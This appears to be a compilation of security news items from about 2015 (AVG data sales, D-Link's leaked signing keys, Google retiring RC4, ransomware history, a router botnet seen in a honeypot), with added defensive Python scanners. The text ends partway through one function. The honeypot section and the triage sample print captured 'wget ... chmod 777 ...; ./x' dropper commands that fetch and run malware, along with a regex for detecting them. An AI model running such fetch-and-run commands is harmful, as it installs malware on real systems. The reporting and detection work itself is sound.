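The trade-off is visible in the first record: a service that applies these checks cannot be logged out by Superlogout either, so the convenience the article praises exists only because the listed services accept an unauthenticated GET for logout. Forced logout is the benign end of that spectrum; the same request shape is what login CSRF and other state-changing GETs rely on.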

AVG Antivirus Plans to Collect & Sell Your Personal Data to Advertisers

We at The Hacker News are big fans of security software: it is the first thing we install when setting up our computers and devices.
Free security software protects Internet users who do not pay for their security.
But remember: nothing comes for free.
"Free" is a relative term, as one of the world's most popular anti-virus companies is now admitting.
Czech Republic-based antivirus company AVG has announced a new privacy policy in which it openly admits that it will collect and sell users' data to online advertisers to make money from its free antivirus software.
The new policy, which comes into effect on October 15, states that AVG may collect and sell users' "non-personal data" in order to "make money from our free offerings so we can keep them free."
Have a Look at the Data AVG Wants to Sell
Here is the list of what AVG calls "non-personal data", which the company says it collects from its customers and sells to interested third parties, specifically online advertisers:
Browsing History,
Search History,
Advertising ID associated with your device,
Internet Service Provider (ISP) or Mobile Network you use to connect to AVG products,
Information regarding other apps you have on your device.
Previous policies only allowed the firm to collect:
Data on "the words you search",
Information about any malware on the users' machine.
Collaborators Will Get Your Personal Data for Free
In announcing the new policy, the firm says it will not sell personal data such as names, email addresses, residential addresses or credit card details (though such data can leak into browsing history).
AVG claims it will filter personal details out of the browsing history before selling it to third parties, but also says that personally identifiable data such as addresses, age or IP addresses may sometimes be shared with collaborators.
The company has published a blog post along with the full privacy policy, so you can read it and decide for yourself whether to keep using its services.

With Its First Android app, Apple tried to Kill Android Community, But Failed Badly!

Are you a die-hard Android fan?
If you are one of the millions of Android fans for whom the brand has become something close to a religion, Apple has something that might give you second thoughts.
Apple is losing control and wants you to ditch your Android!
A few days ago, Apple made its debut on the Google Play Store with its first Android app, called "Move to iOS".
With its first ever Android app, Apple set out to win over the Android community, and failed badly.
Apple's new app is an unsolicited assistant for the case where you have bought a new iPhone, iPad or iPod touch and are wondering how to migrate data from your current Android device.
The 'Move to iOS' app is designed to help Android users transfer their content quickly and safely from an Android device to an iOS device.
The Apple App will help you in Migrating Data, like:
Camera photos and videos
Mail accounts
Message history
Web bookmarks
How does it work?
This is how the synchronisation between the two devices begins:
The iOS device creates a private Wi-Fi network and finds your Android device, which has the Move to iOS app open, so that the data transfer can start.
On the iOS device, open the 'Move from Android' screen and tap Start; a 10-digit security code appears, which you enter on the Android device while the 'Move to iOS' screen is displayed.
Then select the content you want to transfer from your Android device, tap Next, and finish setting up your new iOS device.
Remember one thing: do not let any distraction, such as a phone call, interrupt the transfer, because if it does the transfer stops and you have to start all over again.
For a smooth transfer, pick a time when you are unlikely to be interrupted.
Android Fans Reacted Angrily (More than 22,000 Negative Reviews)!
Unsurprisingly, more than 22,000 Android users reacted angrily on the Google Play Store, branding Apple's app 'Pointless', 'Useless', 'Garbage' and 'Inferior' in the review section, among thousands of other negative comments.
Why? Going through the user responses on the Play Store, we found some telling reviews:
"Come on. Google has supported your platform with their services from the start, even as your rival. I barfed a little in my mouth when I heard that this would be your first app on the Android platform, but this is what I've come to expect out of Apple as a company.", one Android user commented.
“Seriously? You think people want to move to a restricted ecosystem that won't even allow you to try apps before you buy??” another Android user commented.
“Why? Now you want Android users to switch to your so called premium products where you copy features from other ecosystem and say pathbreaking technology. Don't need one.” wrote another.
At the time of writing, more than 22,650 Android users have posted negative one-star reviews on the Play Store, as shown.

Microsoft has Built its own Linux Operating System

Hold on to your seats, because this is going to be a shock.
Microsoft has developed an operating system powered by Linux.
Yes, really.
Microsoft has built its own Linux-based operating system, called Azure Cloud Switch (ACS), and under Satya Nadella the company has become more open than ever.
According to an announcement in an official blog post on Microsoft's website, Azure Cloud Switch (ACS) is described as a "cross-platform modular operating system for data center networking built on Linux", or simply a "commodity switch software stack for data center networks".
The purpose of developing the Linux-based Azure Cloud Switch (ACS) is to make it simpler for Microsoft to control the hardware from multiple vendors (network switches) that powers its cloud services.
And here is the kicker:
"Running on Linux, ACS [Azure Cloud Switch] is able to make use of its vibrant ecosystem. ACS allows to use and extend Open Source, Microsoft, and Third Party applications."
The main functional blocks of the ACS stack, from top to bottom, are shown in the image below.
However, Microsoft's Linux distribution is not going to appear on desktops or servers any time soon, because it is not a general-purpose operating system.
For now, the Azure Cloud Switch (ACS) Linux OS is an internal tool that Microsoft uses to "debug, fix as well as test software bugs much faster", to scale down the software, and to develop features for its enterprise and cloud services.
Microsoft Azure Cloud Switch (ACS) was demonstrated at the SIGCOMM conference in August 2015 at Imperial College London.
This move by Satya Nadella's Microsoft is really significant.
If you’re interested in the technical deep dive into Azure Cloud Switch (ACS), you will find it on the Microsoft Azure blog.
Microsoft... To Win, Make Love, Not War.
This is not the first time Microsoft has partnered with rival technologies.
Earlier this year, Microsoft had announced its partnership with Cyanogen, the most popular third-party ROM for Android phones and tablets.
And Cyanogen is reportedly working on deeper integration of Microsoft’s Digital personal virtual assistant, Cortana, into its latest version of Operating System.

Thousands of Hacked WordPress Sites Abused to Infect Millions of Visitors

A large number of WordPress websites have been compromised in the last two weeks by a new malware campaign spotted in the wild.
WordPress, the free and open source content management system (CMS) and blogging tool, has once again been targeted by hackers at scale.
Researchers at Sucuri Labs have detected a malware campaign that aims to reach as many devices as it can by turning innumerable WordPress websites into its prey.
The campaign has been running for more than 14 days, but it saw a massive increase in infections in the last two days, affecting more than 5,000 WordPress websites.
The researchers call this malware "VisitorTracker", after a JavaScript function named visitorTracker_isMob() in the malicious code.
The campaign appears to use the Nuclear Exploit Kit, combining hacked WordPress sites, hidden iframes and a number of known and unknown browser exploits.
As the name suggests, it tracks every visitor who accesses a compromised WordPress site and redirects them to a specially crafted page where the Nuclear Exploit Kit is planted.
So, Plan of Action is:
Inject malicious code into all the JavaScript files on the compromised WordPress website.
When a visitor arrives, send them to the exploit landing page via an iframe.
The landing page pushes browser exploits at the victim's system to gain access.
Note the two distinct layers here: the WordPress sites themselves were most likely compromised through vulnerable plugins (hence the advice below to keep them patched), while the exploit kit attacks the browsers of the sites' visitors, with data theft as the end goal.
The Sucuri researchers team as a solution suggest, “The infection is very buggy and often removed single-quotes from legitimate files that corrupt the site completely. Affects plugins, themes and even core files of WordPress and Joomla. The solution is to restore files from a clean backup.”
To check whether your site is affected, run the following command (as a user with rights to read the web root):
grep -r "visitorTracker_isMob" /var/www/
Additionally, as a prevention:
Keep your plugins up-to-date, with latest security patches implemented.
Always maintain a backup of your sensitive data.
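The grep above finds the known indicator, but the Sucuri note also says the infection damages legitimate files, which no string search will catch. The script below is added here as an example and is not Sucuri's or WordPress's own tooling. It does both jobs: it scans a web root for the visitorTracker_isMob indicator in web file types, and it compares every file against a SHA-256 manifest taken from a clean backup, which is the remediation the page recommends. The sample site tree, including the infected theme script and the quote-stripped plugin file, is constructed inside a temporary directory for the example.

```python
import hashlib
import os
import re
import tempfile
from typing import Dict, Iterator, List, Tuple

INDICATOR = re.compile(rb"visitorTracker_isMob")  # function name reported by Sucuri
SCAN_SUFFIXES = (".js", ".php", ".html", ".htm")


def iter_files(root: str) -> Iterator[Tuple[str, str]]:
    """Yield (relative_posix_path, absolute_path) for every file under root."""
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            yield os.path.relpath(full, root).replace(os.sep, "/"), full


def find_indicator(root: str) -> List[str]:
    """Equivalent of `grep -r visitorTracker_isMob`, restricted to web file types."""
    hits = []
    for rel, full in iter_files(root):
        if not rel.endswith(SCAN_SUFFIXES):
            continue
        with open(full, "rb") as fh:
            if INDICATOR.search(fh.read()):
                hits.append(rel)
    return sorted(hits)


def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def manifest(root: str) -> Dict[str, str]:
    """Relative path -> SHA-256 for a tree; take this from the clean backup."""
    return {rel: sha256_file(full) for rel, full in iter_files(root)}


def compare_to_clean(live_root: str, clean: Dict[str, str]) -> Dict[str, List[str]]:
    """Files changed since, added since, or missing from the clean copy.

    This catches the collateral damage the page describes (stripped quotes in
    otherwise legitimate files) and attacker drop files, neither of which
    carries the indicator string.
    """
    live = manifest(live_root)
    return {
        "modified": sorted(p for p in live if p in clean and live[p] != clean[p]),
        "added": sorted(p for p in live if p not in clean),
        "missing": sorted(p for p in clean if p not in live),
    }


def _write(root: str, rel: str, data: bytes) -> None:
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as fh:
        fh.write(data)


def demo() -> Dict[str, object]:
    """Build a constructed clean backup and a tampered live copy, then scan the latter."""
    clean_js = b"jQuery(function () { console.log('ready'); });\n"
    infected_js = clean_js + (b"function visitorTracker_isMob(){"
                              b"return /Android|iPhone/.test(navigator.userAgent);}\n")
    clean_php = b"<?php echo 'Hello World'; ?>\n"
    corrupted_php = b"<?php echo Hello World; ?>\n"  # single quotes stripped, as the page describes
    with tempfile.TemporaryDirectory() as backup, tempfile.TemporaryDirectory() as live:
        for root, js, php in ((backup, clean_js, clean_php), (live, infected_js, corrupted_php)):
            _write(root, "wp-content/themes/demo/theme.js", js)
            _write(root, "wp-content/plugins/demo/demo.php", php)
            _write(root, "readme.html", b"<html>unchanged</html>\n")
        _write(live, "wp-content/uploads/.cache.php", b"<?php /* dropped by attacker */ ?>\n")
        return {"infected": find_indicator(live), "diff": compare_to_clean(live, manifest(backup))}


if __name__ == "__main__":
    print(demo())
```

On a real site the manifest comes from the backup you restore from, not from the live tree; a manifest built after the compromise would bless the damage. Anything in "added" under wp-content/uploads that is executable deserves a look even when the indicator scan is clean.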

D-Link Accidentally Publishes Its Private Code-Signing Keys on the Internet

Malware authors do not always have to steal or buy a valid code-signing certificate to sign their malware; sometimes the manufacturer hands one over without realising it.
That is exactly what Taiwan-based networking equipment manufacturer D-Link did: it accidentally published its private code-signing keys inside the company's open source firmware packages.
Dutch news site Tweakers was made aware of the issue by one of its readers, who uses the online moniker "bartvbl". He had bought a D-Link DCS-5020L security camera and downloaded its firmware from D-Link, which open-sources its firmware under the GPL licence.
While inspecting the firmware source, the reader found what appeared to be four different private keys used for code signing.
Hackers Could Sign Malware
In a test, the reader built a Windows application and successfully signed it with one of the four D-Link code-signing keys, whose certificate was still valid at the time.
The other three private code-signing keys he found did not appear to be valid.
Alongside the private keys in the source code, the reader also found the passphrases needed to use them for signing.
It is unclear whether these private keys have been used by malicious third parties, but a signing key that has been public for months could have been used to sign malware so that it passes as legitimate D-Link software.
The findings were confirmed by Yonathan Klijnsma from Dutch security firm Fox-IT.
"The code signing certificate is indeed in a firmware package, firmware version 1.00b03, whose source was released February 27 this year," Klijnsma said.
Meanwhile, D-Link has responded by revoking the certificate in question and releasing a new version of the firmware that no longer contains any code-signing keys.
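The root cause above is a release process that never looked for key material before publishing a source package. The following is an added example, not D-Link's or Tweakers' code: a pre-publish scan that walks a tree and flags PEM private-key blocks by their header and files whose names suggest signing material or stored pass-phrases. The demo tree, its file names and contents are constructed here; the PEM body is a placeholder, not a real key.

```python
"""Scan a source/firmware tree for private-key material before it is published.

Added example (not D-Link's code): it flags PEM private-key blocks by their
header and files whose names suggest signing material or pass-phrases. The
demo tree, its file names and contents are constructed for this demo.
"""
import os
import re
import tempfile

# PEM headers OpenSSL writes for RSA/EC/DSA/PKCS#8 (plain or encrypted) private keys.
PEM_PRIVATE_KEY = re.compile(rb"-----BEGIN (?:RSA |EC |DSA |ENCRYPTED )?PRIVATE KEY-----")
# Name heuristics: key/container extensions and words hinting at a stored pass-phrase.
SUSPICIOUS_NAME = re.compile(r"\.(?:pfx|p12|pem|key|jks|snk)$|pass(?:phrase|word|wd)", re.I)


def scan_tree(root, max_bytes=1 << 20):
    """Return sorted (relative_path, [reasons]) for every file that looks like leaked key material."""
    findings = []
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            reasons = []
            if SUSPICIOUS_NAME.search(name):
                reasons.append("suspicious-name")
            try:
                with open(path, "rb") as fh:
                    head = fh.read(max_bytes)  # keys are small; cap reads so big blobs do not stall the scan
            except OSError:
                continue
            if PEM_PRIVATE_KEY.search(head):
                reasons.append("pem-private-key")
            if reasons:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                findings.append((rel, reasons))
    return sorted(findings)


def build_demo_tree():
    """Create a throwaway tree mimicking a firmware source package (constructed sample data)."""
    root = tempfile.mkdtemp(prefix="fw-src-")
    files = {
        "src/main.c": b"int main(void) { return 0; }\n",
        "README": b"GPL firmware sources\n",
        # A PEM private key left in a tools directory (body is a placeholder, not a real key).
        "tools/sign/codesign.pem": b"-----BEGIN RSA PRIVATE KEY-----\nAAAA\n-----END RSA PRIVATE KEY-----\n",
        # A pass-phrase file next to it; also not something to ship.
        "tools/sign/passphrase.txt": b"example-passphrase\n",
        # Misleading name but harmless content: only the name rule fires, which is the point of two rules.
        "docs/keymap.key": b"keyboard layout table\n",
    }
    for rel, data in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
    return root


if __name__ == "__main__":
    for rel, why in scan_tree(build_demo_tree()):
        print(f"{rel}: {', '.join(why)}")
```

Run this as a gate in the release pipeline and fail the build on any "pem-private-key" hit; a "suspicious-name" hit alone is a review item rather than a hard failure, since names like keymap.key show. It does not check whether a found certificate is expired or revoked; revocation, as D-Link had to do here, is the separate clean-up step once a key has already shipped.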

Google Details Plans to Disable SSLv3 and RC4

As expected, Google formally announced its intent to move away from the stream cipher RC4 and the SSLv3 protocol this week, citing a long history of weaknesses in both.

Adam Langley, a security engineer for the company, announced the plans through a blog post on Thursday. While there isn't a concrete timeline, Langley said that Google is looking to do away with support for RC4 and SSLv3 in all of its frontend servers, Chrome, Android, web crawlers, and SMTP servers in the medium term.

The fact that the company is looking to cut ties with both should come as little surprise.

The Internet Engineering Task Force deprecated SSLv3 in a Standards Track document (RFC 7568) over the summer, calling it "not sufficiently secure" and adding that "any version of TLS is more secure than SSLv3."

As Langley notes in the post, RC4 is 28 years old, and while it held up well in its early years, it has been the target of multiple attacks over time, including some that can lead to TLS session compromise and cookie decryption.

As part of the switch Google also announced a collection of minimum standards for TLS clients going forward. According to the post, Google will eventually require the following of devices:

TLS 1.2 must be supported.
A Server Name Indication (SNI) extension must be included in the handshake and must contain the domain that’s being connected to.
The cipher suite TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 must be supported with P-256 and uncompressed points.
At least the certificates in must be trusted.
Certificate handling must be able to support DNS Subject Alternative Names and those SANs may include a single wildcard as the left-most label in the name.
Langley notes that devices that don’t meet the requirements won’t stop working anytime soon, but acknowledges they may be affected by TLS changes later down the line, up to the year 2020.
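What the list above means in practice for a client is easiest to see in code. The following is an added example using Python's ssl module (3.7 or newer); it is not Google's code. make_client_context() refuses anything below TLS 1.2 and strips RC4 while keeping the required ECDHE-RSA AES-128-GCM suite, connect() shows that SNI is sent via server_hostname, and hostname_matches_san() implements the "single wildcard, only as the left-most label" rule for DNS SANs. The extra refusal of a wildcard covering a whole TLD (for example *.com) is my own conservative assumption, not something the post states.

```python
"""Client-side enforcement of the minimum TLS bar listed above, plus a SAN matcher.

Added example using Python's ssl module (3.7+); it is not Google's code.
"""
import socket
import ssl

# OpenSSL spelling of TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256.
REQUIRED_SUITE = "ECDHE-RSA-AES128-GCM-SHA256"


def make_client_context():
    """Context that cannot negotiate SSLv3/TLS 1.0/1.1 and never offers RC4."""
    ctx = ssl.create_default_context()            # certificate verification and hostname check on
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2  # nothing older goes on the wire, so no SSLv3 fallback
    # Put the required suite first, allow other ECDHE+AES-GCM suites, and forbid RC4 and
    # anonymous/null suites explicitly. (TLS 1.3 suites are configured separately by OpenSSL.)
    ctx.set_ciphers(REQUIRED_SUITE + ":ECDHE+AESGCM:!RC4:!aNULL:!eNULL:!MD5")
    return ctx


def rc4_suites(ctx):
    """Names of any RC4 suites the context would still offer; should be empty."""
    return [c["name"] for c in ctx.get_ciphers() if "RC4" in c["name"]]


def offers_required_suite(ctx):
    return any(c["name"] == REQUIRED_SUITE for c in ctx.get_ciphers())


def hostname_matches_san(hostname, san):
    """dNSName matching: case-insensitive; exact, or '*' as the whole left-most label
    matching exactly one label. Partial-label wildcards (w*.example.com) and wildcards
    in any other position are rejected."""
    h = hostname.lower().rstrip(".").split(".")
    s = san.lower().rstrip(".").split(".")
    if "*" not in san:
        return h == s
    if s[0] != "*" or any("*" in label for label in s[1:]):
        return False  # wildcard must be the entire left-most label and appear only there
    if len(s) < 3:
        return False  # assumption: never let '*.tld' match every name under a TLD
    return len(h) == len(s) and h[1:] == s[1:]


def connect(host, port=443):
    """Open a connection that sends SNI (server_hostname) and enforces the bar above.
    Needs network access, so it is shown for usage and not exercised offline."""
    ctx = make_client_context()
    with socket.create_connection((host, port)) as raw:
        with ctx.wrap_socket(raw, server_hostname=host) as tls:
            return tls.version(), tls.cipher()[0]


if __name__ == "__main__":
    ctx = make_client_context()
    print("min version:", ctx.minimum_version.name, "RC4 offered:", rc4_suites(ctx))
    print("www.example.com vs *.example.com:", hostname_matches_san("www.example.com", "*.example.com"))
```

The one thing Langley's warning turns on is visible in set_ciphers: a client only breaks when it has nothing but RC4 to offer, so removing RC4 from an otherwise modern list changes nothing for a server that already supports an ECDHE/AES-GCM suite.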

“If your TLS client, webserver or email server requires the use of SSLv3 or RC4 then the time to update was some years ago, but better late than never. However, note that just because you might be using RC4 today doesn’t mean that your client or website will stop working: TLS can negotiate cipher suites and problems will only occur if you don’t support anything but RC4,” Langley wrote.

Langley announced preliminary plans to deprecate RC4 earlier this month in a post to the mailing list, confirming that the cipher would be disabled in a future Chrome build, likely reaching the stable channel around January or February 2016.

The company has already taken one step towards nixing SSLv3: a month after last fall’s POODLE attack it did away with support for the fallback to SSLv3 in Chrome, a move that went hand in hand with the company’s phasing out of the SHA-1 cryptographic hash algorithm.

The evolution of ransomware: From PC Cyborg to a service for sale

Without a doubt, malware is – and has always been – one of the main threats to IT. Over the years, it has become one of the primary causes of security incidents, from the early years with viruses, to more sophisticated and relatively high-impact threats such as ransomware.
Similarly, the reasons for developing and distributing malicious code have changed over time from testing a system’s functionality in order to gain recognition for the malware’s creators, to reaping some kind of benefit – mainly financial profit – in an increasingly quicker timeframe.
In this post, we will take a look at the evolution of ransomware, the type of malware used mostly for hijacking user data, from its initial versions to the most recent cases, where it is now sold on the market as a service.
The beginnings of information hijacking, way back in 1989

Much has been written about cases of ransomware in these pages, and particularly about the many different campaigns to distribute and infect machines with variants of this family of malware, which has proved highly profitable for its developers. For example, in the 2015 Trustwave Global Security Report, it was estimated that cybercriminals can get up to 1,425 per cent return on investment for a malware campaign of this kind.
Although it is not a new idea, information hijacking has acquired new relevance in recent years due to its impact on users and companies that have been negatively affected by malware which performs this function, and also due to its increasing diversification.
The first case of ransomware dates back to 1989, with the appearance of a trojan called PC Cyborg. This replaced the AUTOEXEC.BAT file, hid the folders and encrypted the names of all the files on the C drive, rendering the system unusable. The user was then asked to “renew their license” by paying $189 to the PC Cyborg Corporation.
In the years that followed, new versions of programs seeking to extort money from users were identified, but unlike the symmetric encryption used by PC Cyborg, these newer programs employed asymmetric encryption algorithms with increasingly long keys. For example, GPCoder came to light in 2005, followed by a series of variants, which first encrypted files with certain extensions and then demanded a payment of between $100 and $200 as a ransom for the encrypted information.
Some variants derived from ransomware

After the first cases of ransomware, other types of malware emerged that worked on the same principle of making information inaccessible. However, rather than using encryption, they instead blocked the user’s system.
One of these is WinLock, a malware program that was first identified in 2010. This would infect the user’s computer, then block it and display a message across the screen that demanded a payment. To obtain the unblock code, the affected user would have to send an SMS message which would cost them around $10. So, rather than affecting files, the focus had turned to blocking access to the user’s equipment and information.
In a similar vein, 2012 saw the emergence of the so-called “police virus” Reveton, which blocked access to the affected user’s system. This malware would display a fake message – supposedly from the local police authority of the country where the threat was taking place – telling the user that they had broken the law. To restore access to their system, a “fine” would have to be paid.
Or so the user thought – regaining access was actually relatively simple. By starting the system in safe mode and then deleting a registry key, the user could access their equipment again without needing to pay the money demanded.
When did ransomware increase in quantity and complexity?

In recent years there have been new waves of malware designed to encrypt the user’s information, enabling cybercriminals to demand a ransom payment that will allow the user to decrypt the files, and these are detected by ESET security solutions as filecoders.
In 2013, CryptoLocker made its importance clear through the number of infections that occurred in various countries. Its main characteristics include encryption using 2048-bit RSA public keys, the fact that it targets only certain file extensions, and C&C communication over the anonymous Tor network.
Almost simultaneously, CryptoWall (a CryptoLocker copycat) made its appearance and succeeded in outdoing its predecessor in terms of the number of infections, partly due to the attack vectors employed: from browser exploit kits and drive-by downloads to the most common method, sending malicious files as email attachments. This malware has adapted over time and evolved into a third version, with changes to various characteristics including its infection vectors and payment methods.
Earlier this year, a new wave of ransomware was identified with the appearance of CTB-Locker, which can be downloaded onto the victim’s computer by means of a TrojanDownloader. Of the various versions in circulation, one was aimed at Spanish-speakers, featuring messages and instructions on making payments written in Spanish.
One of the features of this malware, also known as Critroni, is that it encrypts files on the hard disk, on removable drives and on network drives using elliptic-curve cryptography, so the files cannot be recovered without the attacker's private key. To preserve their anonymity, the operators connect to the C&C server via Tor, and they demand a ransom of eight bitcoins.
Ransomware has grown in diversity too

We have borne witness to how this type of threat has increased in scale, with increasingly complex mechanisms that make it almost impossible to get back the information without having to make a payment to the cybercriminal. Even then, that is no guarantee that the files will be recoverable.
Similarly, the threat has increased in terms of diversity too. For example, in 2014, we saw the first case of filecoder malware for Android, which is currently the most widespread platform for mobile devices. SimpLocker appeared on the scene displaying the same messages that were used for the police virus. It worked by scanning the device’s SD card for files with specific extensions for the same purpose: to encrypt them and then demand a ransom payment in exchange for decrypting them.
Other similar malware like AndroidLocker has appeared too. Its main characteristics include impersonating legitimate security solutions and applications for Android, in order to try and gain a user’s trust.
Continuing the process of diversification, in recent months there has been a significant increase in the use of ransomware targeting the Internet of Things (IoT). Various devices such as smart watches and TVs are susceptible to being affected by this type of malicious software, mainly those running the Android operating system.
Is this a threat that’s here to stay?

It is clear that the proliferation of ransomware is a growing trend, and one that is highly likely to keep on growing, not least because it is now possible to buy it as a service. Ransomware as a Service (RaaS) has been discovered to be available through a tool called Tox, which enables people to create this type of malware automatically, without requiring technical knowledge.
Similarly, with the recent revelation that the first open-source ransomware (Hidden Tear) has been published, a new window of opportunity has opened for developing this malware and variants of it, leading to predictions of increasingly sophisticated malware being developed and deployed on a massive scale.
The facts and figures lead us to believe that we are facing a threat that will continue to exist for years to come, due primarily to the unlawful but substantial profit it represents for its creators and the number of devices and users susceptible to being affected.
For this reason, the most important thing is to keep following good practices, using security solutions against malware, and above all to use common sense in order to avoid becoming a victim, or at least to ensure that the consequences of becoming infected are minimal. Despite everything, although the threat is complex, diverse, and widespread, the methods of distribution and infection have not changed greatly.

UK’s NCA calls for global approach to cybercrime

The UK’s National Crime Agency (NCA) is keen to work more closely with security organizations around the world to tackle the global threat of cybercrime.
Speaking recently at the CLOUDSEC London 2015 conference, Oliver Gower, head of strategy, partnerships and transformation at the NCA’s National Cyber Crime Unit, said that a joint-up approach is vital.
He explained that because of the international nature of the threat – and the fact that cybercriminals pay no attention to national boundaries – it is important that the security world comes together to combat a universal menace.
The Register reported that this collective strategy will help the NCA “reach across jurisdictions, and bust underworld gangs around the planet”.
Mr Gower said that this approach should take inspiration from the so-called Five Eyes partnership between the US’ National Security Agency, the UK’s Government Communications Headquarters, Canada’s Communications Security Establishment, Australia’s Australian Signals Directorate and New Zealand’s Government Communications Security Bureau.
The goal of this alliance, which emerged in the aftermath of the second world war, is to share information and intelligence on matters of security.
Mr Gower said that a collaborative approach from security professionals is necessary because managing trans-jurisdictional efforts to fight cybercrime is extremely difficult as it currently stands.
“Police investigators struggle to accept their technical limitations, and need the help of talented information security types to keep up with progress,” the online news provider reported.
“Deconfliction between different police forces is increasingly an issue for crime-busting coalitions, too.
“The possibility of undercover cybercops having their investigations blown by blue-on-blue bungling – an officer in one country interrupting and scuppering the work of another – is increasingly an issue.”
In related news, the NCA’s website was recently attacked, with the Lizard Squad claiming responsibility.
The denial-of-service attack was thought to be in response to the NCA's recent spate of arrests relating to the illegal use of a tool known as the Lizard Stresser.
This is a paid-for online service that allows individuals to carry out attacks on websites, taking them offline for up to eight hours.

A thieving router botnet is attacking Ubiquiti airRouters

19.9.2015 Vulnerabilities

For the past two weeks, the botnet trying hardest to log in to the SSH honeypot we run on Turris routers has consisted of IP addresses that, according to Shodan, often share one trait: port 80 answers with AirOS running on a Ubiquiti airRouter. After a successful login, malware is installed on the router.

Not long ago, by watching attackers in our telnet honeypots, we uncovered an interesting botnet made up of ASUS home routers. For the past two weeks, the most persistent visitor to the SSH honeypot running on Turris routers has again been a botnet whose IP addresses, according to Shodan, often share one characteristic: port 80 responds with an AIROS_SESSIONID cookie.

That cookie points to AirOS running on a Ubiquiti airRouter. According to Shodan data, about 20% of the roughly 6,500 attacking IP addresses can be identified as AirOS by this cookie. Many addresses, however, come from dynamic pools that Shodan does not know about yet.

The botnet is very fond of the username and password combination ubnt:ubnt (we do not normally accept this combination on the SSH honeypot, and failed login attempts are not shown on the web). It is the default combination for the airRouter, and there are evidently still plenty of units whose default settings have never been changed. On top of that, the SSH port is reachable from the internet.

So we bought an airRouter and watched what happened. Only a few minutes passed before attackers tried to log in to it. It was like going back 10 years to the time when the Sasser worm was widespread. At the peak of its fame, Windows machines were infected before updates could even be applied (the only way around it was an offline installation and an offline patch).

The malware sample is quite well known thanks to its noisiness: it is PNScan.2, which the botnet tries to spread further. Shortly after installation it begins attacking other machines. The files holding the lists of IP addresses to attack are notable for being "pre-scanned", i.e. the attackers already know that SSH is running on the target machines.

If you wait longer, processes of further trojans downloaded by PNScan appear; most of the running processes belong to malware (PID, user, VSZ, state, command):

PID USER VSZ STAT COMMAND
902 ubnt 812 R /usr/bin/
1005 ubnt 272 S /usr
1209 ubnt 3632 S /tmp/.xs/daemon.mips.mod
1210 ubnt 3632 S /tmp/.xs/daemon.mips.mod
1211 ubnt 3632 S /tmp/.xs/daemon.mips.mod
1212 ubnt 3632 S /tmp/.xs/daemon.mips.mod
1213 ubnt 3632 S /tmp/.xs/daemon.mips.mod
1236 ubnt 1972 S sh -c wget -c http://x.x.x.x/wras;chmod 777 wras;./wras;
1239 ubnt 3564 S ./wras
1240 ubnt 3564 S ./wras
1241 ubnt 3564 S ./wras
1248 ubnt 1972 S sh -c wget -c http://x.x.x.x/hsde;chmod 777 hsde;./hsde;
1251 ubnt 3564 S ./hsde
1252 ubnt 3564 S ./hsde
1253 ubnt 3564 S ./hsde
1292 ubnt 1972 S sh -c wget -c http://x.x.x.x/wras;chmod 777 wras;./wras;
1295 ubnt 3564 S ./wras
1296 ubnt 3564 S ./wras
1297 ubnt 3564 S ./wras
1302 ubnt 1972 S sh -c wget -c http://x.x.x.x/hsde;chmod 777 hsde;./hsde;
1305 ubnt 3564 S ./hsde
1306 ubnt 3564 S ./hsde
1307 ubnt 3564 S ./hsde
1368 ubnt 1972 S sh -c wget -c http://x.x.x.x/wras;chmod 777 wras;./wras;
1371 ubnt 3564 S ./wras
1372 ubnt 3564 S ./wras
1373 ubnt 3564 S ./wras
1427 ubnt 816 S /usr/bin/
The less usual trojan processes shown as "/usr" and "/usr/bin" belong to the Tsunami trojan. This disguise is done simply by changing argv[0], and it is baffling why the attacker did not pick something a little less conspicuous. The conclusion, though, is not very surprising: a vulnerable device does not survive untouched on the internet for long.

So if you own this router, take a look at what processes are running on it. And if you are planning to buy one, we recommend configuring it first without an internet connection, setting a strong password and, if you do not really need it, disabling the SSH server for connections from the internet.
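"Take a look at what processes are running" is quicker with a script that knows what to look for. The following is an added example and not the Turris team's tooling: it parses a BusyBox-style ps listing and flags the patterns visible above. The heuristics are my own (argv[0] that names a directory, as with the Tsunami processes; executables under /tmp or inside hidden directories; "./" relative executables; and "wget ...; chmod 777 ...; ./x" dropper one-liners). SAMPLE_PS copies lines from the listing above (x.x.x.x as printed there) plus two constructed benign lines (init and dropbear) to show they pass.

```python
"""Triage a BusyBox 'ps' listing for the kinds of processes seen on the infected airRouter.

Added example; not the Turris team's tooling. Heuristics are my own, and the
sample listing mixes lines copied from the article with two constructed benign ones.
"""
import re
from collections import namedtuple

SAMPLE_PS = """\
PID   USER       VSZ STAT COMMAND
    1 root      1352 S    init
  300 root      2010 S    /usr/sbin/dropbear -p 22
  902 ubnt       812 R    /usr/bin/
 1005 ubnt       272 S    /usr
 1209 ubnt      3632 S    /tmp/.xs/daemon.mips.mod
 1236 ubnt      1972 S    sh -c wget -c http://x.x.x.x/wras;chmod 777 wras;./wras;
 1239 ubnt      3564 S    ./wras
 1427 ubnt       816 S    /usr/bin/
"""

Proc = namedtuple("Proc", "pid user vsz stat cmd")

# Directories on a typical embedded Linux image; no legitimate program is named like this.
SYSTEM_DIRS = {"/", "/bin", "/sbin", "/usr", "/usr/bin", "/usr/sbin", "/lib", "/etc", "/var", "/tmp"}
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
# Fetch, mark executable, run: the dropper pattern visible in the listing.
DOWNLOAD_AND_RUN = re.compile(r"\b(?:wget|curl|tftp)\b.*;\s*chmod\s+(?:\+x|[0-7]{3,4})\b")


def parse_ps(text):
    """Parse 'PID USER VSZ STAT COMMAND' lines; the header and short lines are skipped."""
    procs = []
    for line in text.splitlines():
        parts = line.split(None, 4)
        if len(parts) < 5 or not parts[0].isdigit():
            continue
        procs.append(Proc(int(parts[0]), parts[1], int(parts[2]), parts[3], parts[4]))
    return procs


def suspicious_reasons(proc):
    """Return the heuristics a process trips, in a fixed order (empty if it looks benign)."""
    argv0 = proc.cmd.split()[0]
    reasons = []
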